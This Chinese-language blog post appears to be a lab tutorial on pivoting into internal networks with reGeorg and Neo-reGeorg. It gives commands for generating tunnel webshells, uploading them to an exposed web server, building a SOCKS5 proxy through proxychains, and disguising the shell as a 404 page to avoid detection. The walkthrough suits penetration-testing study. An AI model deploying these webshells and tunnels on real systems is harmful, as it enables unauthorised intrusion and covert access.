跳板攻击之:reGeorg 代理转发

郑重声明:

本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

1 原理

reGeorg 代理转发是将内网服务器端的数据通过 HTTP/HTTPS 隧道转发到本机,实现基于 HTTP 协议的通信。

2 Neo-reGeorg

  • reGeorg 脚本的特征非常明显,容易被杀毒软件查杀,需要做免杀处理。
  • Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是:
    • 提高 tunnel 连接安全性
    • 提高可用性,避免特征检测
    • 提高传输内容保密性
    • 应对更多的网络环境场景
  • 下载地址:Release Neo-reGeorg v3.8.1 · L-codes/Neo-reGeorg (github.com)

2.1 实验环境

2.2 利用过程

  1. 对外服务器Win10需要有web服务,可使用phpstudy新建一个

  2. 设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) ,并上传到对外服务器 Win10 WEB服务根目录下,并确保 kali主机可以访问Win10 服务器上的 tunnel.jsp 文件

    # python neoreg.py generate -k acmd

    [+] Mkdir a directory: neoreg_servers
    
    [+] Create neoreg server files:
    
       => neoreg_servers/tunnel.jspx
    
       => neoreg_servers/tunnel_compatibility.jspx
    
       => neoreg_servers/tunnel.aspx
    
       => neoreg_servers/tunnel.ashx
    
       => neoreg_servers/tunnel.jsp
    
       => neoreg_servers/tunnel_compatibility.jsp
    
       => neoreg_servers/tunnel.php
    • -k:密码

  3. 使用 neoreg.py 连接 WEB 服务器,在本地建立 socks5 代理

    # python3 neoreg.py -k acmd -u http://192.168.50.236/tunnel.php

+------------------------------------------------------------------------+
    
  Log Level set to [ERROR]
    
  Starting SOCKS5 server [127.0.0.1:1080]
    
  Tunnel at:
    
    http://192.168.50.236/tunnel.php
    
+------------------------------------------------------------------------+
    • -k:密码,与生成tunnel时的密码要保持一致

  4. 配置 Proxychains

    vim /etc/proxychains4.conf
    
socks5  127.0.0.1 1080

  5. 代理访问内网服务器

2.3 Advanced Usage

  1. 支持生成的服务端,默认直接请求响应指定的页面内容 (如伪装的 404 页面)
$ python neoreg.py generate -k <you_password> --file 404.html --httpcode 404

$ python neoreg.py -k <you_password> -u <server_url> --skip
  1. 如服务端 WEB,需要设置代理才能访问
$ python neoreg.py -k <you_password> -u <server_url> --proxy socks5://10.1.1.1:8080
  1. 如需 Authorization 认证和定制的 Header 或 Cookie
$ python neoreg.py -k <you_password> -u <server_url> -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cookie "key=value;key2=value2"
  1. 需要分散请求,可上传到多个路径上,如内存马
$ python neoreg.py -k <you_password> -u <url_1> -u <url_2> -u <url_3> ...
  1. 开启内网转发,应对负载均衡
$ python neoreg.py -k <you_password> -u <url> -r <redirect_url>
  1. 使用端口转发功能,非启动 socks5 服务 ( 127.0.0.1:1080 -> ip:port )
$ python neoreg.py -k <you_password> -u <url> -t <ip:port>
  • 更多关于性能和稳定性的参数设置参考 -h 帮助信息
# 生成服务端脚本

$ python neoreg.py generate -h

    usage: neoreg.py [-h] -k KEY [-o DIR] [-f FILE] [-c CODE] [--read-buff Bytes]

                     [--max-read-size KB]

    Generate neoreg webshell

    optional arguments:

      -h, --help            show this help message and exit

      -k KEY, --key KEY     Specify connection key.

      -o DIR, --outdir DIR  Output directory.

      -f FILE, --file FILE  Camouflage html page file

      -c CODE, --httpcode CODE

                            Specify HTTP response code. When using -r, it is

                            recommended to <400. (default: 200)

      --read-buff Bytes     Remote read buffer. (default: 513)

      --max-read-size KB    Remote max read size. (default: 512)

# 连接服务端

$ python neoreg.py -h

    usage: neoreg.py [-h] -u URI [-r URL] [-t IP:PORT] -k KEY [-l IP] [-p PORT]

                     [-s] [-H LINE] [-c LINE] [-x LINE] [--php-connect-timeout S]

                     [--local-dns] [--read-buff KB] [--read-interval MS]

                     [--write-interval MS] [--max-threads N] [--cut-left N]

                     [--cut-right N] [-v]

    Socks server for Neoreg HTTP(s) tunneller. DEBUG MODE: -k

    (debug_all|debug_base64|debug_headers_key|debug_headers_values)

    optional arguments:

      -h, --help            show this help message and exit

      -u URI, --url URI     The url containing the tunnel script

      -r URL, --redirect-url URL

                            Intranet forwarding the designated server (only

                            jsp(x))

      -t IP:PORT, --target IP:PORT

                            Network forwarding Target, After setting this

                            parameter, port forwarding will be enabled

      -k KEY, --key KEY     Specify connection key

      -l IP, --listen-on IP

                            The default listening address.(default: 127.0.0.1)

      -p PORT, --listen-port PORT

                            The default listening port.(default: 1080)

      -s, --skip            Skip usability testing

      -H LINE, --header LINE

                            Pass custom header LINE to server

      -c LINE, --cookie LINE

                            Custom init cookies

      -x LINE, --proxy LINE

                            Proto://host[:port] Use proxy on given port

      --php-connect-timeout S

                            PHP connect timeout.(default: 0.5)

      --local-dns           Use local resolution DNS

      --read-buff KB        Local read buffer, max data to be sent per

                            POST.(default: 7, max: 50)

      --read-interval MS    Read data interval in milliseconds.(default: 300)

      --write-interval MS   Write data interval in milliseconds.(default: 200)

      --max-threads N       Proxy max threads.(default: 1000)

      --cut-left N          Truncate the left side of the response body

      --cut-right N         Truncate the right side of the response body

      --extract EXPR        Manually extract BODY content. (eg: <html><p>REGBODY</p></html> )

      -v                    Increase verbosity level (use -vv or more for greater

                            effect)

2.4 Remind

  • Mac OSX 上运行 neoreg.py 时,高并发请求会出现网络丢包情况,可通过 ulimit -n 2560 修改当前 shell 的 "最大文件打开数"

  • Tomcat5 等 jdk 低版本情况,用 tunnel_compatibility.jsp(x) 即可

3 reGeorg 代理转发

3.1 实验环境

3.2 利用过程

  1. 将脚本文件上传到Win2012服务器中,并确保 evil 主机可以访问Win2012服务器上的 tunnel.jsp 文件

  2. 在 evil 主机上,利用 reGeorgSocksProxy.py 脚本监听本地的 4444 端口,即可建立代理通信。

    python reGeorgSocksProxy.py -u http://192.168.0.21/regeorg/tunnel.aspx -p 4444

  3. 配置 Proxychains

    vim /etc/proxychains4.conf
    
socks5  127.0.0.1 4444

  4. 代理访问 bulldog

跳板攻击之:reGeorg 代理转发的更多相关文章

  1. ssh代理转发

    实验环境 serverA:172.16.2.116 serverB:172.16.2.225 serverC:172.16.2.115 "代理转发"是针对ssh认证过程的一种转发 ...

  2. curl运行json串,代理转发格式

    curl -b 'uin=o0450654733; skey=@tq9xjRvYy' -H "Content-Type: application/json" -X POST -d ...

  3. windows下使用密钥登录Linux及xshell代理转发

    1.密钥登录原理 一般我们使用xshell访问远程主机(Linux主机)时,都是先请管理员给我们开一个账户,即为我们设置一个一个用户名和对应的密码,然后我们就可以使用下面的方式登录到远程主机了: 在这 ...

  4. IIS充当代理转发请求到Kestrel

    接着上篇博文为ASP.NetCore程序启用SSL的code,这篇将介绍如何用IIS充当反向代理的角色转发请求到Kestrel服务器 与ASP.NET不同,ASP.netCore使用的是自托管web服 ...

  5. Nginx代理转发Apache+svn

    1.安装svn和httpd yum install httpd yum install subversion mod_dav_svn 创建仓库目录 mkdir -p /var/www/svn 3.创建 ...

  6. nginx反向代理转发后页面上的js css文件无法加载【原创】

    故障现象:nginx做代理转发后,发现页面上的js css文件无法加载,页面样式乱了. 原因:没有配置静态资源 解决js css文件无法加载无法访问的问题 解决办法: 修改配置文件nginx.conf ...

  7. Docker Kubernetes hostPort 代理转发

    Docker Kubernetes  hostPort 代理转发 hostPort: 1. 类似docker -p 映射宿主级端口到容器. 2. 容器所在的主机暴露端口转发到指定容器中. 3. hos ...

  8. IIS充当反向代理转发请求到Kestrel

    接着上篇博文为ASP.NetCore程序启用SSL的code,这篇将介绍如何用IIS充当反向代理的角色转发请求到Kestrel服务器 介绍 与ASP.NET不同,ASP.netCore使用的是自托管w ...

  9. iis和apache共用80端口,IIS代理转发apache

    为什么共用80端口应该不用多说了,服务器上程序运行环境有很多套,都想抢用80端口,所以就有了共用80端口的解决方案. 网上很多的教程一般都是设置APACHE使用默认80端口,代理转发IIS的网站,II ...

  10. (转)基于live555的流媒体代理转发服务器

    对于并发量并不大而且对性能要求不是很高的流媒体传输模块,live555还是很好的选择,下面说一下我所实现的流媒体代理服务器(目前只能实现对H264单视频的转发)代理转发主要 对于并发量并不大而且对性能 ...

随机推荐

  1. WEB入门——信息搜集1-20

    WEB1--查看源码 查看源码即可得flag. WEB2--JS前端禁用 查看源码即可得flag. JavaScript实现禁用的方法简单来说就是当用户使用键盘执行某一命令是返回的一种状态,而这种状态 ...

  2. Excel二维码图片生成器

    Excel二维码图片生成器 它可以将excel文件的数据,每行数据生成一张二维码图片,并保存到电脑.软件无需安装,解压后即可直接使用,无需联网,操作简便快捷. 软件下载地址:点此下载 步骤1:导入事先 ...

  3. SpringBoot中搭配AOP实现自定义注解

    1 springBoot的依赖 确定项目中包含可以注解的依赖 <dependency> <groupId>org.springframework.boot</groupI ...

  4. f-strings: Python字符串处理的瑞士军刀

    从 3.6 开始,Python 新增了一个格式化字符串的方法,称之为 f-string. 其用法就是在python原始字符串的基础上增加 f/F 前缀,以大括号 {} 标明被替换的字段. f-stri ...

  5. Java7提供的Fork/Join框架实现高并发程序,你会使用吗?

    摘要:Fork/Join框架位于J.U.C(java.util.concurrent)中,是Java7中提供的用于执行并行任务的框架,其可以将大任务分割成若干个小任务,最终汇总每个小任务的结果后得到最 ...

  6. Django框架:13、csrf跨站请求伪造、auth认证模块及相关用法

    Django框架 目录 Django框架 一.csrf跨站请求伪造 1.简介 2.csrf校验策略 form表单csrf策略 ajax请求csrf策略 3.csrf相关装饰器 FBV添加装饰器方式 C ...

  7. [OpenCV实战]42 数码单反相机的技术细节

    在这篇文章中,我们将说明数码单反相机DSLR(Digital Single Lens Reflex Camera)的各个技术方面.本文将说明焦距(focal length),f-stop,景深(dep ...

  8. [深度学习] fast-reid入门教程

    fast-reid入门教程 ReID,全拼为Re-identification,目的是利用各种智能算法在图像数据库中找到与要搜索的目标相似的对象.ReID是图像检索的一个子任务,本质上是图像检索而不是 ...

  9. 企业应用架构研究系列二十四:SQL Server 数据库调优之XEvent 探查器

    如果入职一些中小型公司,往往需要接手一些很"坑"的项目,到底多坑就不牢骚了,只讲一下,如果破解这些历史遗留的项目问题.项目代码可能短时间无法进行通读研究,我们就需要从底层数据库进行 ...

  10. 1.【窗口组件】小部件-QWidgt

    一.前言 QWidget翻译过来是小部件的意思,QWidgt 类是所有用户界面对象的基类. 窗口部件是用户界面的一个基本单元:它从窗 口系统接收鼠标.键盘和其它事件,并且在屏幕上绘制自己.每一个窗口部 ...